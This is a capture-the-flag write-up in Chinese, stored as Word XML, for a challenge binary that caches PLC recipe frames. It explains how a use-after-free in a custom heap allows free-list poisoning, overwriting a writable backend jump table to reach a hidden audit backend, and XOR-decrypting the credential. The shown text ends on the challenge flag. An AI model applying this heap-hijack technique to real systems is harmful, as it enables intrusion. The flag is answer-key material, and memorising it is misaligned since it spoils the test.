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任务18 pwn-2 writeup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>一、附件分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">外层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwn-2.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>题目描述.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与内层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwn-2.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，内层解包后得到：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>plc_rcp              29608 字节   x86-64 ELF, static, 非 PIE, stripped</w:t>
        <w:br/>
        <w:t>recipe_policy.json    1898 字节   后端清单与凭据有效性声明</w:t>
        <w:br/>
        <w:t>demo_recipe.txt        343 字节   出厂示例维护脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">题面说明：网关通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plc_rcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 把上位机下发的配方帧（定长 32 字节）缓存在静态堆中，堆管理器为厂商自研的 bump 分配 + 单向空闲链表；现场只开放 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 两个渲染后端，缓存管理器对已释放的帧缓冲仍保留可写槽位指针，且空闲链表直接写在用户数据区，无任何加固。目标是把保留后端接起来，取得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>status=valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的凭据。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799" cy="3639376"/>
            <wp:docPr id="1" name="Picture 1" descr="image-2026101716595700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659570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3639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eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>recipe_policy.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的后端表：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>index 0  render  status=open      obtained_by render 0      无凭据</w:t>
        <w:br/>
        <w:t>index 1  export  status=open      obtained_by render 1      无凭据</w:t>
        <w:br/>
        <w:t>index 2  diag    status=decoy     接口未开放                诊断凭据，不作答案</w:t>
        <w:br/>
        <w:t>index 3  audit   status=valid     接口未开放                唯一有效答案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 段另有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>selftest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（decoy）。即 render / export 不产出凭据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>diag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>selftest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均为干扰，仅 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 有效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>二、二进制结构与命令解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与反汇编确认命令集为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alloc/free/write/read/dump/render/selftest/reset/quit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，每帧 32 字节，块头 8 字节，步长 0x28。运行出厂示例可确认堆布局与空闲链表计数行为：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433998"/>
            <wp:docPr id="2" name="Picture 2" descr="image-2026101717004640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700464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33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t>$ ./plc_rcp &lt; demo_recipe.txt</w:t>
        <w:br/>
        <w:t>allocated</w:t>
        <w:br/>
        <w:t>written</w:t>
        <w:br/>
        <w:t>slot 0: 524e5257462d5245434950452d303100...</w:t>
        <w:br/>
        <w:t>recipe render: ok</w:t>
        <w:br/>
        <w:t>recipe export: ok</w:t>
        <w:br/>
        <w:t>heap: 40/4096 bytes, free list: 0 block(s)</w:t>
        <w:br/>
        <w:t>freed</w:t>
        <w:br/>
        <w:t>heap: 40/4096 bytes, free list: 1 block(s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>heap: 40/4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 说明每块 0x28 字节、堆上限 0x1000，堆区为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4040a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4050a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">；分配时若空闲链表为空则按 bump 递交新块并在块头写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，否则直接弹出链表头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>三、分配器逆向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的语义（反汇编 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4010a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4010f0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>alloc():</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if freelist_head != NULL:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      p = freelist_head</w:t>
        <w:br/>
        <w:t xml:space="preserve">      freelist_head = *(void**)p          # 空闲块前 8 字节即 next</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return p</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      *(size_t*)bump = 0x20</w:t>
        <w:br/>
        <w:t xml:space="preserve">      p = bump + 8</w:t>
        <w:br/>
        <w:t xml:space="preserve">      bump += 0x28</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return p</w:t>
        <w:br/>
        <w:br/>
        <w:t>free(p):</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if p == NULL: return</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *(u32*)(p - 4) = 1                      # 块头标志置 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *(void**)p = freelist_head              # 把 next 写进用户区首 8 字节</w:t>
        <w:br/>
        <w:t xml:space="preserve">  freelist_head = p                       # LIFO 头插</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>关键缺陷有两点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 只把块的用户区首 8 字节改写成 next，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>不清空槽位数组中的指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，已释放块的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通道仍然有效；同时链表节点就落在用户数据区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可以直接改写任意空闲块的 next。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的越界约束在同一函数中：目标槽指针若非空，则按 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[slot, slot+0x20)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 校验写入长度，超出即报 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bad hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，因此单次写入最多覆盖 32 字节，恰为两个连续的 8 字节指针 + 16 字节余量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>四、后端调用逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>render &lt;n&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的处理（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401b4d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 起）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>n = parse_int(arg)</w:t>
        <w:br/>
        <w:t>if n &gt; 1:  print("backend not enabled"); continue</w:t>
        <w:br/>
        <w:t>if slot[0] == NULL:  n = 0                # 临时寄存器被覆盖，索引恒为 0</w:t>
        <w:br/>
        <w:t>call qword ptr [0x402000 + n*8]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">后端跳转表位于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x402000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，前两项分别指向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">）与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>0x402000  00 10 40 00 00 00 00 00     -&gt; render</w:t>
        <w:br/>
        <w:t>0x402008  20 10 40 00 00 00 00 00     -&gt; export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被限制在 0/1 之内，但跳转表项本身是普通可写数据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 段），只要能让"用户区"覆盖到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x402000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，就能改写表项，把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>render 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重定向到任意函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>五、保留后端入口与凭据密文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中可见三个保留后端与三条凭据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>diagnostic backend (reserved)     -&gt; 0x4011d0，打印后跳到 0x401160，key = "GAID-PCR"</w:t>
        <w:br/>
        <w:t>audit backend (reserved)          -&gt; 0x401210，打印后跳到 0x401160，key = "IDUA-PCR"</w:t>
        <w:br/>
        <w:t>recipe cache self-test ok         -&gt; 0x401250，selftest 命令，key = "SETS-PCR"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>凭据解密函数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>），对固定长度 31 字节做逐字节变换：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>out[i] = cipher[i] XOR (0x27 * i &amp; 0xff) XOR key[i &amp; 7]     i = 0..30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">三份密文分别在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.rodata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x403080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（selftest）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4030a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（diag）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x4030c0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（audit）。离线按同一公式解出三份明文（见解题脚本 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>decrypt_credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>audit     flag{Fr33l1st_P01s0n_2026_Heap}</w:t>
        <w:br/>
